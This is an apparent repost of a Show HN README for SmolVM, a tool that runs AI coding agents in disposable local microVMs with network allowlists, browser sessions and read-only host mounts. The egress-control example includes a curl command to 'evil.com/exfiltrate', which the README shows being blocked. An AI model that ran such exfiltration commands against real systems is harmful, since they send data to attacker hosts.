Show HN: Run coding agents in a sandbox locally

Source: hackernews · Summarized and analyzed by Genesis Park

Summary

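SmolVM provides disposable virtual machines that boot in 0.5 seconds so AI agents can execute code safely. Hardware isolation stronger than that of containers protects the host system, and a sandbox can save its state or access a browser and local directories when needed.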

Body

SmolVM gives AI agents their own disposable computer. Each microVM boots in about 500 ms, runs any code or software you throw at it, keeps state when you need it, and vanishes when you don't. Nothing touches your host.

Features:

- Sub-second boot: VMs ready in ~500 ms.
- Hardware isolation: stronger security than containers.
- Network controls: domain allowlists for egress filtering.
- Browser sessions: a full browser that agents can see and control.
- Host mounts: give sandboxes read access to local directories.
- Snapshots: save and restore VM state instantly.
- Coding agents: start an environment with a pre-installed coding agent.
- OpenClaw: GUI Linux apps inside a sandbox.

Use cases:

- Run untrusted code safely. Execute AI-generated code in an isolated sandbox instead of on your machine.
- Give agents a browser. Spin up a full browser session that agents can see and control in real time.
- Let agents read your project. Mount a local directory so agents can explore your codebase inside a sandbox.
- Keep state across turns. Reuse the same sandbox throughout a multi-step workflow.

Install SmolVM with a single command:

    curl -sSL https://celesto.ai/install.sh | bash

This installs everything you need (including Python), configures your machine, and verifies the setup.

Manual installation:

    pip install smolvm
    smolvm setup
    smolvm doctor

On supported Linux and macOS systems, `pip install smolvm` also pulls in the matching smolvm-core wheel automatically. Most users do not need Rust installed. Linux may prompt for sudo during setup so it can install host dependencies and configure runtime permissions.

For golden-AMI builds, two-stage deploys, pinning the Firecracker version, and other non-default install paths, see docs/installation.md.
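The manual install ends with `smolvm doctor`. A script that depends on SmolVM could run the same check before it starts. The sketch below is a hypothetical helper (`smolvm_ready` is not part of SmolVM), and it assumes that `smolvm doctor` reports problems through a non-zero exit code, which the README does not state.

```python
import shutil
import subprocess


def smolvm_ready(executable: str = "smolvm") -> bool:
    """Return True if the CLI is on PATH and `<executable> doctor` exits with 0.

    Hypothetical helper, not part of SmolVM.
    """
    path = shutil.which(executable)
    if path is None:
        # CLI not installed, or not on PATH for this user.
        return False
    # Assumption: `smolvm doctor` signals a broken setup with a non-zero exit code.
    completed = subprocess.run([path, "doctor"], capture_output=True, text=True)
    return completed.returncode == 0


if __name__ == "__main__":
    print("SmolVM ready" if smolvm_ready() else "SmolVM missing or setup incomplete")
```

If the exit-code assumption does not hold, parsing the command's output would be the fallback.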
Run a command in a sandbox from Python:

    from smolvm import SmolVM

    vm = SmolVM()  # create a sandbox
    result = vm.run("echo 'Hello from the sandbox!'")  # run a shell command inside it
    print(result)
    vm.stop()  # shut the sandbox down

Create a sandbox, check that it's running, then stop it:

    smolvm create --name my-sandbox
    # my-sandbox  running  172.16.0.2
    smolvm list
    # NAME        STATUS   IP
    # my-sandbox  running  172.16.0.2
    smolvm stop my-sandbox

Open a shell inside a running sandbox:

    smolvm ssh my-sandbox

It sucks to "press enter and accept changes" every few seconds while using coding agents. SmolVM makes it easy to isolate the agent's coding environment from the host (your laptop). With a single command you get a sandbox with Claude or Codex pre-installed and git credentials ready, so you can build a billion-dollar business without making any mistakes ;)

    smolvm codex start   # start a new environment with codex preinstalled
    smolvm claude start  # start a new environment with claude preinstalled

SmolVM can also start a full browser inside a sandbox. This is useful when agents need to navigate websites, fill out forms, or take screenshots.

Start a browser session with a live view you can watch in your own browser:

    smolvm browser start --live
    # Session: sess_a1b2c3
    # Live view: http://localhost:6080

Open the URL to watch the browser in real time. When you're done, list and stop sessions:

    smolvm browser list
    smolvm browser stop sess_a1b2c3

See examples/browser_session.py for the Python equivalent.

By default, sandboxes have full internet access. You can restrict which domains a sandbox can reach by passing `internet_settings`:

    from smolvm import SmolVM

    vm = SmolVM(internet_settings={
        "allowed_domains": ["https://api.openai.com"],
    })
    vm.run("curl https://api.openai.com/v1/models")  # allowed
    vm.run("curl https://evil.com/exfiltrate")       # blocked

See docs/concepts/network-egress-controls.md for how it works under the hood.

You can give a sandbox read access to a folder on your machine. This is useful when an agent needs to work with an existing project without copying files back and forth.
    smolvm create --mount ~/Projects/my-app
    smolvm ssh my-sandbox
    ls /workspace   # your host files appear here

The host folder is read-only: the sandbox can read every file, but changes stay inside the sandbox and never touch the originals. If the agent creates or edits files under `/workspace`, those changes live only in the VM's overlay layer.

Mount at a custom path, or mount multiple directories:

    smolvm create --mount ~/Projects/my-app:/code --mount ~/data:/mnt/data

The same works from Python:

    from smolvm import SmolVM

    with SmolVM(mounts=["~/Projects/my-app"]) as vm:
        result = vm.run("ls /workspace")
        print(result.stdout)

Note: This feature is read-only for now. Any changes you make inside the sandbox do not travel back to the host. Write-back support is planned for a future release.

| What you'll learn | Example |
|---|---|
| Run code in a sandbox | quickstart_sandbox.py |
| Start a browser session | browser_session.py |
| Pass environment variables into a sandbox | env_injection.py |

These examples show how to wrap SmolVM as a tool for popular agent frameworks, so an AI model can run shell commands or drive a browser through your sandbox.

| Framework | Example |
|---|---|
| OpenAI Agents | openai_agents_tool.py |
| LangChain | langchain_tool.py |
| PydanticAI: shell tool | pydanticai_tool.py |
| PydanticAI: reusable sandbox across turns | pydanticai_reusable_tool.py |
| PydanticAI: browser automation | pydanticai_agent_browser.py |
| Computer use (click and type) | computer_use_browser.py |

| What it does | Example |
|---|---|
| Install and run OpenClaw inside a Debian sandbox with a 4 GB root filesystem | openclaw.py |

Each script shows its own `pip install ...` line when it needs extra packages.

SmolVM automatically trusts new sandboxes on first connection to keep setup simple. This is safe for local development, but you should not expose sandbox network ports publicly without extra controls. See SECURITY.md for the full policy and scope.
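The framework examples listed above all wrap a sandbox as a tool that a model can call. A framework-neutral version of that idea might look like the sketch below. It is not taken from the example scripts: `ShellTool`, `FakeSandbox`, `FakeResult`, and `max_chars` are hypothetical names. The only assumption about SmolVM is what the README itself shows, namely that a sandbox has a `run(command)` method whose result may carry a `stdout` attribute.

```python
from dataclasses import dataclass, field
from typing import Any, List, Protocol


class Sandbox(Protocol):
    """Anything with run(command), for example a SmolVM instance."""

    def run(self, command: str) -> Any: ...


@dataclass
class ShellTool:
    """Hypothetical wrapper that exposes one sandbox as a shell tool."""

    sandbox: Sandbox
    max_chars: int = 4000  # cap on the text handed back to the model

    def __call__(self, command: str) -> str:
        result = self.sandbox.run(command)
        # The README reads result.stdout; fall back to str() if it is absent.
        text = getattr(result, "stdout", None)
        if text is None:
            text = str(result)
        if len(text) > self.max_chars:
            text = text[: self.max_chars] + "\n[output truncated]"
        return text


@dataclass
class FakeResult:
    stdout: str


@dataclass
class FakeSandbox:
    """Stand-in so the sketch runs without SmolVM installed."""

    commands: List[str] = field(default_factory=list)

    def run(self, command: str) -> FakeResult:
        self.commands.append(command)
        return FakeResult(stdout=f"ran: {command}\n")


if __name__ == "__main__":
    tool = ShellTool(FakeSandbox())
    print(tool("ls /workspace"))
```

With the real SDK the tool would presumably be built as `ShellTool(SmolVM())`. Because the wrapper holds a single sandbox, every call lands in the same VM, which is what keeping state across turns requires. Call `vm.stop()` when the workflow ends.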
SmolVM ships a benchmark suite that measures the timings AI agents actually feel: cold start, time-to-interactive, pause/resume, and snapshot create/restore. It drives the public Python SDK on whichever backend is native to your host: Firecracker on Linux, QEMU on macOS.

Run it locally:

    uv run python scripts/benchmarks/bench.py

See scripts/benchmarks/README.md for flags, output format, and what each metric means.

See CONTRIBUTING.md to get started.

Licensed under Apache 2.0; see LICENSE for details.
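For a rough idea of what the cold-start and time-to-interactive numbers from the benchmark suite described above capture, the following sketch times any sandbox-like object. It is not the project's `bench.py`. `bench_startup` is a hypothetical helper, and it assumes that cold start means the time until the sandbox constructor returns and that time-to-interactive means the time until a first command completes. The suite's own definitions are in scripts/benchmarks/README.md.

```python
import statistics
import time
from typing import Any, Callable, Dict, List


def bench_startup(
    create: Callable[[], Any],
    probe: Callable[[Any], Any],
    destroy: Callable[[Any], Any],
    runs: int = 5,
) -> Dict[str, float]:
    """Return median cold-start and time-to-interactive, in milliseconds."""
    cold_ms: List[float] = []
    tti_ms: List[float] = []
    for _ in range(runs):
        t0 = time.perf_counter()
        sandbox = create()  # assumed to return once the VM exists
        t1 = time.perf_counter()
        try:
            probe(sandbox)  # first command finishing counts as "interactive"
            t2 = time.perf_counter()
        finally:
            destroy(sandbox)  # always clean up, even if the probe fails
        cold_ms.append((t1 - t0) * 1000.0)
        tti_ms.append((t2 - t0) * 1000.0)
    return {
        "cold_start_ms": statistics.median(cold_ms),
        "time_to_interactive_ms": statistics.median(tti_ms),
    }


if __name__ == "__main__":
    # Dummy callables stand in for a real sandbox so the sketch runs anywhere.
    stats = bench_startup(
        create=lambda: time.sleep(0.01) or object(),
        probe=lambda sandbox: time.sleep(0.01),
        destroy=lambda sandbox: None,
        runs=3,
    )
    print(stats)
```

With the SDK calls shown in the README, an invocation might look like `bench_startup(SmolVM, lambda vm: vm.run("true"), lambda vm: vm.stop())`.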

This analysis was written by the Genesis Park editorial team with the help of AI. The original is available via the source link.
